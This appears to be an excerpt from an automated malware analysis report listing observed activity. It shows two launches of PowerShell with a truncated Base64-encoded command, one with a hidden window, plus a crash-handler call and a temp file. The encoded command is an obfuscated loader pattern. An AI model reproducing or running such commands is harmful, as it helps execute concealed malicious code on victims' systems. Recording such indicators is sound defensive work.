Technical information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABBAFUARwBfAEcAYwBBAFgAPQAoACcATABYACcAKwAnAEQAdwBVAEIAQQAnACkAOwAkAE0AQgBBAGsAVQA0AEEAIAA9ACAAKAAnADgAJwArACcANgA5ACcAKQA7ACQAWQBrAFUAQQBBAEEAQQA9ACgAJwBwACcAKwAnAEQAQgBHAEEARwAnACsAJwBRAC...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1552
- %TEMP%\1375850.cvr
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABBAFUARwBfAEcAYwBBAFgAPQAoACcATABYACcAKwAnAEQAdwBVAEIAQQAnACkAOwAkAE0AQgBBAGsAVQA0AEEAIAA9ACAAKAAnADgAJwArACcANgA5ACcAKQA7ACQAWQBrAFUAQQBBAEEAQQA9ACgAJwBwACcAKwAnAEQAQgBHAEEARwAnACsAJwBRAC...' (with hidden window)